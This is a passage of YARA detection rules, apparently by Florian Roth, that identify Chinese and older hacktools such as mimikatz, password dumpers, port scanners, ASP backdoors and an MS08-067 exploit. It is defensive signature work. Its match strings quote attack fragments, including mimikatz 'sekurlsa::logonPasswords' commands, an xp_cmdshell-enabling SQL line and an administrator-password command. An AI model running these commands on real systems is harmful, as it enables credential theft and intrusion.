   		$s1 = "<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)" fullword ascii /* PEStudio Blacklist: strings */ /* score: '59.00' */   
   		$s2 = "iam.exe -h administrator:mydomain:"  ascii /* PEStudio Blacklist: strings */ /* score: '40.00' */   
   		$s3 = "An error was encountered when trying to change the current logon credentials!." fullword ascii /* PEStudio Blacklist: strings */ /* score: '33.00' */   
   		$s4 = "optional parameter. If iam.exe crashes or doesn't work when run in your system, use this parameter." fullword ascii /* PEStudio Blacklist: strings */ /* score: '30.00' */   
   		$s5 = "IAM.EXE will try to locate some memory locations instead of using hard-coded values." fullword ascii /* score: '26.00' */   
   		$s6 = "Error in cmdline!. Bye!." fullword ascii /* score: '12.00' */   
   		$s7 = "Checking LSASRV.DLL...." fullword ascii /* score: '12.00' */   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 300KB and all of them   
rule Hacktools_CN_Http {   
   	meta:   
   		description = "Disclosed hacktool set - file Http.exe"   
   		author = "Florian Roth"   
   		date = "17.11.14"   
   		score = 60   
   		hash = "788bf0fdb2f15e0c628da7056b4e7b1a66340338"   
   	strings:   
   		$s0 = "RPCRT4.DLL" fullword ascii   
   		$s1 = "WNetAddConnection2A" fullword ascii   
   		$s2 = "NdrPointerBufferSize" fullword ascii   
   		$s3 = "_controlfp" fullword ascii   
   	condition:   
   		all of them and filesize < 10KB   
rule HScan_v1_20_hscan {   
   	meta:   
   		description = "Chinese Hacktool Set - file hscan.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "568b06696ea0270ee1a744a5ac16418c8dacde1c"   
   	strings:   
   		$s1 = "[%s]: Found \"FTP account: anyone/anyone@any.net\"  !!!" fullword ascii   
   		$s2 = "%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,100" fullword ascii   
   		$s3 = ".\\report\\%s-%s.html" fullword ascii   
   		$s4 = ".\\log\\Hscan.log" fullword ascii   
   		$s5 = "[%s]: Found cisco Enable password: %s !!!" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 200KB and 2 of them   
rule Payload_Exe2Hex : toolkit {   
   	meta:   
   		description = "Detects payload generated by exe2hex"   
   		author = "Florian Roth"   
   		reference = "https://github.com/g0tmi1k/exe2hex"   
   		date = "2016-01-15"   
   		score = 70   
   	strings:   
   		$a1 = "set /p \"=4d5a" ascii   
   		$a2 = "powershell -Command \"$hex=" ascii   
   		$b1 = "set+%2Fp+%22%3D4d5" ascii   
   		$b2 = "powershell+-Command+%22%24hex" ascii   
   		$c1 = "echo 4d 5a " ascii   
   		$c2 = "echo r cx >>" ascii   
   		$d1 = "echo+4d+5a+" ascii   
   		$d2 = "echo+r+cx+%3E%3E" ascii   
   	condition:   
   		all of ($a*) or all of ($b*) or all of ($c*) or all of ($d*)   
rule Smartniff {   
   	meta:   
   		description = "Chinese Hacktool Set - file Smartniff.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "67609f21d54a57955d8fe6d48bc471f328748d0a"   
   	strings:   
   		$s1 = "smsniff.exe" fullword wide   
   		$s2 = "support@nirsoft.net0" fullword ascii   
   		$s3 = "</requestedPrivileges></security></trustInfo></assembly>" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 200KB and all of them   
rule kappfree {   
   	meta:   
   		description = "Chinese Hacktool Set - file kappfree.dll"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "e57e79f190f8a24ca911e6c7e008743480c08553"   
   	strings:   
   		$s1 = "Bienvenue dans un processus distant" fullword wide   
   		$s2 = "kappfree.dll" fullword ascii   
   		$s3 = "kappfree de mimikatz pour Windows (anti AppLocker)" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 200KB and all of them   
rule UnPack_rar_Folder_InjectT {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file InjectT.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "80f39e77d4a34ecc6621ae0f4d5be7563ab27ea6"   
   	strings:   
   		$s0 = "%s -Install                          -->To Install The Service" fullword ascii   
   		$s1 = "Explorer.exe" fullword ascii   
   		$s2 = "%s -Start                            -->To Start The Service" fullword ascii   
   		$s3 = "%s -Stop                             -->To Stop The Service" fullword ascii   
   		$s4 = "The Port Is Out Of Range" fullword ascii   
   		$s7 = "Fail To Set The Port" fullword ascii   
   		$s11 = "\\psapi.dll" fullword ascii   
   		$s20 = "TInject.Dll" fullword ascii   
      
   		$x1 = "Software\\Microsoft\\Internet Explorer\\WinEggDropShell" fullword ascii   
   		$x2 = "injectt.exe" fullword ascii   
   	condition:   
   		( 1 of ($x*) ) and ( 3 of ($s*) )   
rule Dos_Down64 {   
   	meta:   
   		description = "Chinese Hacktool Set - file Down64.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "43e455e43b49b953e17a5b885ffdcdf8b6b23226"   
   	strings:   
   		$s1 = "C:\\Windows\\Temp\\Down.txt" fullword wide   
   		$s2 = "C:\\Windows\\Temp\\Cmd.txt" fullword wide   
   		$s3 = "C:\\Windows\\Temp\\" fullword wide   
   		$s4 = "ProcessXElement" fullword ascii   
   		$s8 = "down.exe" fullword wide   
   		$s20 = "set_Timer1" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 150KB and all of them   
rule Mimikatz_Memory_Rule_1 : APT {   
   	meta:   
   		author = "Florian Roth"   
   		date = "12/22/2014"   
   		score = 70   
   		type = "memory"   
   		description = "Detects password dumper mimikatz in memory"   
   	strings:   
   		$s1 = "sekurlsa::msv" fullword ascii   
   	    $s2 = "sekurlsa::wdigest" fullword ascii   
   	    $s4 = "sekurlsa::kerberos" fullword ascii   
   	    $s5 = "sekurlsa::tspkg" fullword ascii   
   	    $s6 = "sekurlsa::livessp" fullword ascii   
   	    $s7 = "sekurlsa::ssp" fullword ascii   
   	    $s8 = "sekurlsa::logonPasswords" fullword ascii   
   	    $s9 = "sekurlsa::process" fullword ascii   
   	    $s10 = "ekurlsa::minidump" fullword ascii   
   	    $s11 = "sekurlsa::pth" fullword ascii   
   	    $s12 = "sekurlsa::tickets" fullword ascii   
   	    $s13 = "sekurlsa::ekeys" fullword ascii   
   	    $s14 = "sekurlsa::dpapi" fullword ascii   
   	    $s15 = "sekurlsa::credman" fullword ascii   
   	condition:   
   		1 of them   
rule FPipe2_0 {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file FPipe2.0.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "891609db7a6787575641154e7aab7757e74d837b"   
   	strings:   
   		$s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii   
   		$s1 = "Unable to resolve hostname \"%s\"" fullword ascii   
   		$s2 = " -s    - outbound connection source port number" fullword ascii   
   		$s3 = "source port for that outbound connection being set to 53 also." fullword ascii   
   		$s4 = "http://www.foundstone.com" fullword ascii   
   		$s19 = "FPipe" fullword ascii   
   	condition:   
   		all of them   
rule Project1 {   
   	meta:   
   		description = "Chinese Hacktool Set - file Project1.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "d1a5e3b646a16a7fcccf03759bd0f96480111c96"   
   	strings:   
   		$s1 = "EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'" fullword ascii   
   		$s2 = "Password.txt" fullword ascii   
   		$s3 = "LoginPrompt" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 5000KB and all of them   
rule Tools_termsrv {   
   	meta:   
   		description = "Chinese Hacktool Set - file termsrv.dll"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "294a693d252f8f4c85ad92ee8c618cebd94ef247"   
   	strings:   
   		$s1 = "Iv\\SmSsWinStationApiPort" fullword ascii   
   		$s2 = " TSInternetUser " fullword wide   
   		$s3 = "KvInterlockedCompareExchange" fullword ascii   
   		$s4 = " WINS/DNS " fullword wide   
   		$s5 = "winerror=%1" fullword wide   
   		$s6 = "TermService " fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 1150KB and all of them   
rule mysqlfast {   
   	meta:   
   		description = "Chinese Hacktool Set - file mysqlfast.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "32b60350390fe7024af7b4b8fbf50f13306c546f"   
   	strings:   
   		$s2 = "Invalid password hash: %s" fullword ascii   
   		$s3 = "-= MySql Hash Cracker =- " fullword ascii   
   		$s4 = "Usage: %s hash" fullword ascii   
   		$s5 = "Hash: %08lx%08lx" fullword ascii   
   		$s6 = "Found pass: " fullword ascii   
   		$s7 = "Pass not found" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 900KB and 4 of them   
rule ByPassFireWall_zip_Folder_Ie {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file Ie.dll"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "d1b9058f16399e182c9b78314ad18b975d882131"   
   	strings:   
   		$s0 = "d:\\documents and settings\\loveengeng\\desktop\\source\\bypass\\lcc\\ie.dll" fullword ascii   
   		$s1 = "LOADER ERROR" fullword ascii   
   		$s5 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii   
   		$s7 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii   
   	condition:   
   		all of them   
rule aspbackdoor_asp1 {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file asp1.txt"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "9ef9f34392a673c64525fcd56449a9fb1d1f3c50"   
   	strings:   
   		$s0 = "param = \"driver={Microsoft Access Driver (*.mdb)}\" " fullword ascii   
   		$s1 = "conn.Open param & \";dbq=\" & Server.MapPath(\"scjh.mdb\") " fullword ascii   
   		$s6 = "set rs=conn.execute (sql)%> " fullword ascii   
   		$s7 = "<%set Conn = Server.CreateObject(\"ADODB.Connection\") " fullword ascii   
   		$s10 = "<%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh " fullword ascii   
   		$s15 = "sql=\"select * from scjh\" " fullword ascii   
   	condition:   
   		all of them   
rule HTTPSCANNER {   
   	meta:   
   		description = "Chinese Hacktool Set - file HTTPSCANNER.EXE"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "ae2929346944c1ea3411a4562e9d5e2f765d088a"   
   	strings:   
   		$s1 = "HttpScanner.exe" fullword wide   
   		$s2 = "HttpScanner" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 3500KB and all of them   
rule whosthere : Toolkit  {   
   	meta:   
   		description = "Auto-generated rule - file whosthere.exe"   
   		author = "Florian Roth"   
   		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"   
   		date = "2015-07-10"   
   		score = 80   
   		hash = "d7a82204d3e511cf5af58eabdd6e9757c5dd243f9aca3999dc0e5d1603b1fa37"   
   	strings:   
   		$s1 = "by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii /* PEStudio Blacklist: strings */ /* score: '48.00' */   
   		$s2 = "whosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found." fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.00' */   
   		$s3 = "specify addresses to use. Format: ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSES" ascii /* PEStudio Blacklist: strings */ /* score: '28.00' */   
   		$s4 = "Could not enable debug privileges. You must run this tool with an account with administrator privileges." fullword ascii /* PEStudio Blacklist: strings */ /* score: '27.00' */   
   		$s5 = "-B is now used by default. Trying to find correct addresses.." fullword ascii /* PEStudio Blacklist: strings */ /* score: '15.00' */   
   		$s6 = "Cannot get LSASS.EXE PID!" fullword ascii /* score: '14.00' */   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 320KB and 2 of them   
rule EditKeyLogReadMe {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file EditKeyLogReadMe.txt"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "dfa90540b0e58346f4b6ea12e30c1404e15fbe5a"   
   	strings:   
   		$s0 = "editKeyLog.exe KeyLog.exe," fullword ascii   
   		$s1 = "WinEggDrop.DLL" fullword ascii   
   		$s2 = "nc.exe" fullword ascii   
   		$s3 = "KeyLog.exe" fullword ascii   
   		$s4 = "EditKeyLog.exe" fullword ascii   
   		$s5 = "wineggdrop" fullword ascii   
   	condition:   
   		3 of them   
rule aspfile2 {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file aspfile2.asp"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "14efbc6cb01b809ad75a535d32b9da4df517ff29"   
   	strings:   
   		$s0 = "response.write \"command completed success!\" " fullword ascii   
   		$s1 = "for each co in foditems " fullword ascii   
   		$s3 = "<input type=text name=text6 value=\"<%= szCMD6 %>\"><br> " fullword ascii   
   		$s19 = "<title>Hello! Welcome </title>" fullword ascii   
   	condition:   
   		all of them   
rule MS08_067_Exploit_Hacktools_CN {   
   	meta:   
   		description = "Disclosed hacktool set - file cs.exe"   
   		author = "Florian Roth"   
   		date = "17.11.14"   
   		score = 60   
   		hash = "a3e9e0655447494253a1a60dbc763d9661181322"   
   	strings:   
   		$s0 = "MS08-067 Exploit for CN by EMM@ph4nt0m.org" fullword ascii   
   		$s3 = "Make SMB Connection error:%d" fullword ascii   
   		$s5 = "Send Payload Over!" fullword ascii   
   		$s7 = "Maybe Patched!" fullword ascii   
   		$s8 = "RpcExceptionCode() = %u" fullword ascii   
   		$s11 = "ph4nt0m" fullword wide   
   		$s12 = "\\\\%s\\IPC" ascii   
   	condition:   
   		4 of them   
rule NetBIOS_Name_Scanner {   
   	meta:   
   		description = "Auto-generated rule on file NetBIOS Name Scanner.exe"   
   		author = "yarGen Yara Rule Generator by Florian Roth"   
   		hash = "888ba1d391e14c0a9c829f5a1964ca2c"   
   	strings:   
   		$s0 = "IconEx"   
   		$s2 = "soft Visual Stu"   
   		$s4 = "NBTScanner!y&"   
   	condition:   
   		all of them   
rule _hscan_hscan_hscangui {   
   	meta:   
   		description = "Chinese Hacktool Set - from files hscan.exe, hscan.exe, hscangui.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		super_rule = 1   
   		hash0 = "17a743e40790985ececf5c66eaad2a1f8c4cffe8"   
   		hash1 = "568b06696ea0270ee1a744a5ac16418c8dacde1c"   
   		hash2 = "af8aced0a78e1181f4c307c78402481a589f8d07"   
   	strings:   
   		$s1 = ".\\log\\Hscan.log" fullword ascii   
   		$s2 = ".\\report\\%s-%s.html" fullword ascii   
   		$s3 = "[%s]: checking \"FTP account: ftp/ftp@ftp.net\" ..." fullword ascii   
   		$s4 = "[%s]: IPC NULL session connection success !!!" fullword ascii   
   		$s5 = "Scan %d targets,use %4.1f minutes" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 240KB and all of them   
rule Jc_WinEggDrop_Shell {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file Jc.WinEggDrop Shell.txt"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "820674b59f32f2cf72df50ba4411d7132d863ad2"   
   	strings:   
   		$s0 = "Sniffer.dll" fullword ascii   
   		$s4 = ":Execute net.exe user Administrator pass" fullword ascii   
   		$s5 = "Fport.exe or mport.exe " fullword ascii   
   		$s6 = ":Password Sniffering Is Running |Not Running " fullword ascii   
   		$s9 = ": The Terminal Service Port Has Been Set To NewPort" fullword ascii   
   		$s15 = ": Del www.exe                   " fullword ascii   
   		$s20 = ":Dir *.exe                    " fullword ascii   
   	condition:   
   		2 of them   
rule HScan_v1_20_PipeCmd {   
   	meta:   
   		description = "Chinese Hacktool Set - file PipeCmd.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "64403ce63b28b544646a30da3be2f395788542d6"   
   	strings:   
   		$s1 = "%SystemRoot%\\system32\\PipeCmdSrv.exe" fullword ascii   
   		$s2 = "PipeCmd.exe" fullword wide   
   		$s3 = "Please Use NTCmd.exe Run This Program." fullword ascii   
   		$s4 = "%s\\pipe\\%s%s%d" fullword ascii   
   		$s5 = "\\\\.\\pipe\\%s%s%d" fullword ascii   
   		$s6 = "%s\\ADMIN$\\System32\\%s%s" fullword ascii   
   		$s7 = "This is a service executable! Couldn't start directly." fullword ascii   
   		$s8 = "Connecting to Remote Server ...Failed" fullword ascii   
   		$s9 = "PIPECMDSRV" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 200KB and 4 of them   
rule CN_Portscan : APT   
   {   
       meta:   
           description = "CN Port Scanner"   
           author = "Florian Roth"   
           release_date = "2013-11-29"   
           confidential = false   
   		score = 70   
       strings:   
       	$s1 = "MZ"   
   		$s2 = "TCP 12.12.12.12"   
       condition:   
           ($s1 at 0) and $s2   
rule Hacktools_CN_Panda_445TOOL {   
   	meta:   
   		description = "Disclosed hacktool set - file 445TOOL.rar"   
   		author = "Florian Roth"   
   		date = "17.11.14"   
   		score = 60   
   		hash = "92050ba43029f914696289598cf3b18e34457a11"   
   	strings:   
   		$s0 = "scan.bat" fullword ascii   
   		$s1 = "Http.exe" fullword ascii   
   		$s2 = "GOGOGO.bat" fullword ascii   
   		$s3 = "ip.txt" fullword ascii   
   	condition:   
   		all of them   
rule CGISscan_CGIScan {   
   	meta:   
   		description = "Auto-generated rule on file CGIScan.exe"   
   		author = "yarGen Yara Rule Generator by Florian Roth"   
   		hash = "338820e4e8e7c943074d5a5bc832458a"   
   	strings:   
   		$s1 = "Wang Products" fullword wide   
   		$s2 = "WSocketResolveHost: Cannot convert host address '%s'"   
   		$s3 = "tcp is the only protocol supported thru socks server"   
   	condition:   
   		all of ($s*)   
rule aspbackdoor_ipclear {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file ipclear.vbs"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "9f8fdfde4b729516330eaeb9141fb2a7ff7d0098"   
   	strings:   
   		$s0 = "Set ServiceObj = GetObject(\"WinNT://\" & objNet.ComputerName & \"/w3svc\")" fullword ascii   
   		$s1 = "wscript.Echo \"USAGE:KillLog.vbs LogFileName YourIP.\"" fullword ascii   
   		$s2 = "Set txtStreamOut = fso.OpenTextFile(destfile, ForWriting, True)" fullword ascii   
   		$s3 = "Set objNet = WScript.CreateObject( \"WScript.Network\" )" fullword ascii   
   		$s4 = "Set fso = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii   
   	condition:   
   		all of them   
rule XScanLib {   
   	meta:   
   		description = "Chinese Hacktool Set - file XScanLib.dll"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "c5cb4f75cf241f5a9aea324783193433a42a13b0"   
   	strings:   
   		$s4 = "XScanLib.dll" fullword ascii   
   		$s6 = "Ports/%s/%d" fullword ascii   
   		$s8 = "DEFAULT-TCP-PORT" fullword ascii   
   		$s9 = "PlugCheckTcpPort" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 360KB and all of them   
rule CN_Hacktool_BAT_PortsOpen {   
   	meta:   
   		description = "Detects a chinese BAT hacktool for local port evaluation"   
   		author = "Florian Roth"   
   		score = 60   
   		date = "12.10.2014"   
   	strings:   
   		$s0 = "for /f \"skip=4 tokens=2,5\" %%a in ('netstat -ano -p TCP') do (" ascii   
   		$s1 = "in ('tasklist /fi \"PID eq %%b\" /FO CSV') do " ascii   
   		$s2 = "@echo off" ascii   
   	condition:   
   		all of them   
rule OracleScan {   
   	meta:   
   		description = "Chinese Hacktool Set - file OracleScan.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "10ff7faf72fe6da8f05526367b3522a2408999ec"   
   	strings:   
   		$s1 = "MYBLOG:HTTP://HI.BAIDU.COM/0X24Q" fullword ascii   
   		$s2 = "\\Borland\\Delphi\\RTL" fullword ascii   
   		$s3 = "USER_NAME" ascii   
   		$s4 = "FROMWWHERE" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 300KB and all of them   
rule ms10048_x86 {   
   	meta:   
   		description = "Chinese Hacktool Set - file ms10048-x86.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "e57b453966e4827e2effa4e153f2923e7d058702"   
   	strings:   
   		$s1 = "[ ] Resolving PsLookupProcessByProcessId" fullword ascii   
   		$s2 = "The target is most likely patched." fullword ascii   
   		$s3 = "Dojibiron by Ronald Huizer, (c) master@h4cker.us ." fullword ascii   
   		$s4 = "[ ] Creating evil window" fullword ascii   
   		$s5 = "%sHANDLEF_INDESTROY" fullword ascii   
   		$s6 = "[+] Set to %d exploit half succeeded" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 100KB and 4 of them   
rule Generate {   
   	meta:   
   		description = "Chinese Hacktool Set - file Generate.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "2cb4c3916271868c30c7b4598da697f59e9c7a12"   
   	strings:   
   		$s1 = "C:\\TEMP\\" fullword ascii   
   		$s2 = "Connection Closed Gracefully.;Could not bind socket. Address and port are alread" wide   
   		$s3 = "$530 Please login with USER and PASS." fullword ascii   
   		$s4 = "_Shell.exe" fullword ascii   
   		$s5 = "ftpcWaitingPassword" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 2000KB and 3 of them   
rule CN_Hacktool_ScanPort_Portscanner {   
   	meta:   
   		description = "Detects a chinese Portscanner named ScanPort"   
   		author = "Florian Roth"   
   		score = 70   
   		date = "12.10.2014"   
   	strings:   
   		$s0 = "LScanPort" fullword wide   
   		$s1 = "LScanPort Microsoft" fullword wide   
   		$s2 = "www.yupsoft.com" fullword wide   
   	condition:   
   		all of them   
rule xscan_gui {   
   	meta:   
   		description = "Chinese Hacktool Set - file xscan_gui.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "a9e900510396192eb2ba4fb7b0ef786513f9b5ab"   
   	strings:   
   		$s1 = "%s -mutex %s -host %s -index %d -config \"%s\"" fullword ascii   
   		$s2 = "www.target.com" fullword ascii   
   		$s3 = "%s\\scripts\\desc\\%s.desc" fullword ascii   
   		$s4 = "%c Active/Maximum host thread: %d/%d, Current/Maximum thread: %d/%d, Time(s): %l" ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 3000KB and all of them   
rule Mimikatz_Logfile   
   {   
   	meta:   
   		description = "Detects a log file generated by malicious hack tool mimikatz"   
   		author = "Florian Roth"   
   		score = 80   
   		date = "2015/03/31"   
   		reference = "https://github.com/Neo23x0/Loki/blob/master/signatures/thor-hacktools.yar"   
   	strings:   
   		$s1 = "SID               :" ascii fullword   
   		$s2 = "* NTLM     :" ascii fullword   
   		$s3 = "Authentication Id :" ascii fullword   
   		$s4 = "wdigest :" ascii fullword   
   	condition:   
   		all of them   
rule Dos_fp {   
   	meta:   
   		description = "Chinese Hacktool Set - file fp.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c"   
   	strings:   
   		$s1 = "fpipe -l 53 -s 53 -r 80 192.168.1.101" fullword ascii   
   		$s2 = "FPipe.exe" fullword wide   
   		$s3 = "http://www.foundstone.com" fullword ascii   
   		$s4 = "%s %s port %d. Address is already in use" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 65KB and all of them   
rule OSEditor {   
   	meta:   
   		description = "Chinese Hacktool Set - file OSEditor.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "6773c3c6575cf9cfedbb772f3476bb999d09403d"   
   	strings:   
   		$s1 = "OSEditor.exe" fullword wide   
   		$s2 = "netsafe" wide   
   		$s3 = "OSC Editor" fullword wide   
   		$s4 = "GIF89" ascii   
   		$s5 = "Unlock" ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 100KB and all of them   
rule x64_klock {   
   	meta:   
   		description = "Chinese Hacktool Set - file klock.dll"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc"   
   	strings:   
   		$s1 = "Bienvenue dans un processus distant" fullword wide   
   		$s2 = "klock.dll" fullword ascii   
   		$s3 = "Erreur : le bureau courant (" fullword wide   
   		$s4 = "klock de mimikatz pour Windows" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 907KB and all of them   
rule kiwi_tools_gentil_kiwi {   
   	meta:   
   		description = "Chinese Hacktool Set - from files kappfree.dll, kelloworld.dll, KiwiCmd.exe, KiwiRegedit.exe, KiwiTaskmgr.exe, klock.dll, mimikatz.exe, sekurlsa.dll, kappfree.dll, kelloworld.dll, KiwiCmd.exe, KiwiRegedit.exe, KiwiTaskmgr.exe, klock.dll, mimikatz.exe, sekurlsa.dll"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		super_rule = 1   
   		hash0 = "e57e79f190f8a24ca911e6c7e008743480c08553"   
   		hash1 = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"   
   		hash2 = "7ac7541e20af7755b7d8141c5c1b7432465cabd8"   
   		hash3 = "9fbfe3eb49d67347ab57ae743f7542864bc06de6"   
   		hash4 = "5c90d648c414bdafb549291f95fe6f27c0c9b5ec"   
   		hash5 = "7addce4434670927c4efaa560524680ba2871d17"   
   		hash6 = "28c5c0bdb7786dc2771672a2c275be7d9b742ec7"   
   		hash7 = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5"   
   		hash8 = "5d578df9a71670aa832d1cd63379e6162564fb6b"   
   		hash9 = "febadc01a64a071816eac61a85418711debaf233"   
   		hash10 = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86"   
   		hash11 = "56a61c808b311e2225849d195bbeb69733efe49a"   
   		hash12 = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16"   
   		hash13 = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc"   
   		hash14 = "f661d6516d081c37ab7da0f4ec21b2cc6a9257c6"   
   		hash15 = "6e0ffa472d63fdda5abc4c1b164ba8724dcb25b5"   
   	strings:   
   		$s1 = "mimikatz" fullword wide   
   		$s2 = "Copyright (C) 2012 Gentil Kiwi" fullword wide   
   		$s3 = "Gentil Kiwi" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 1000KB and all of them   
rule Hacktools_CN_Burst_Thecard {   
   	meta:   
   		description = "Disclosed hacktool set - file Thecard.bat"   
   		author = "Florian Roth"   
   		date = "17.11.14"   
   		score = 60   
   		hash = "50b01ea0bfa5ded855b19b024d39a3d632bacb4c"   
   	strings:   
   		$s0 = "tasklist |find \"Clear.bat\"||start Clear.bat" fullword ascii   
   		$s1 = "Http://www.coffeewl.com" fullword ascii   
   		$s2 = "ping -n 2 localhost 1>nul 2>nul" fullword ascii   
   		$s3 = "for /L %%a in (" fullword ascii   
   		$s4 = "MODE con: COLS=42 lines=5" fullword ascii   
   	condition:   
   		all of them   
rule iKAT_startbar {   
   	meta:   
   		description = "Tool to hide unhide the windows startbar from command line - iKAT hack tools - file startbar.exe"   
   		author = "Florian Roth"   
   		date = "05.11.14"   
   		score = 50   
   		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"   
   		hash = "0cac59b80b5427a8780168e1b85c540efffaf74f"   
   	strings:   
   		$s2 = "Shinysoft Limited1" fullword ascii   
   		$s3 = "Shinysoft Limited0" fullword ascii   
   		$s4 = "Wellington1" fullword ascii   
   		$s6 = "Wainuiomata1" fullword ascii   
   		$s8 = "56 Wright St1" fullword ascii   
   		$s9 = "UTN-USERFirst-Object" fullword ascii   
   		$s10 = "New Zealand1" fullword ascii   
   	condition:   
   		all of them   
rule sql1433_SQL {   
   	meta:   
   		description = "Chinese Hacktool Set - file SQL.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "025e87deadd1c50b1021c26cb67b76b476fafd64"   
   	strings:   
   		/* WIDE: ProductName 1433 */   
   		$s0 = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 31 00 34 00 33 00 33 }   
   		/* WIDE: ProductVersion 1,4,3,3 */   
   		$s1 = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 31 00 2C 00 34 00 2C 00 33 00 2C 00 33 }   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 90KB and all of them   
rule RangeScan {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file RangeScan.exe"   
   		author = "Florian Roth"   
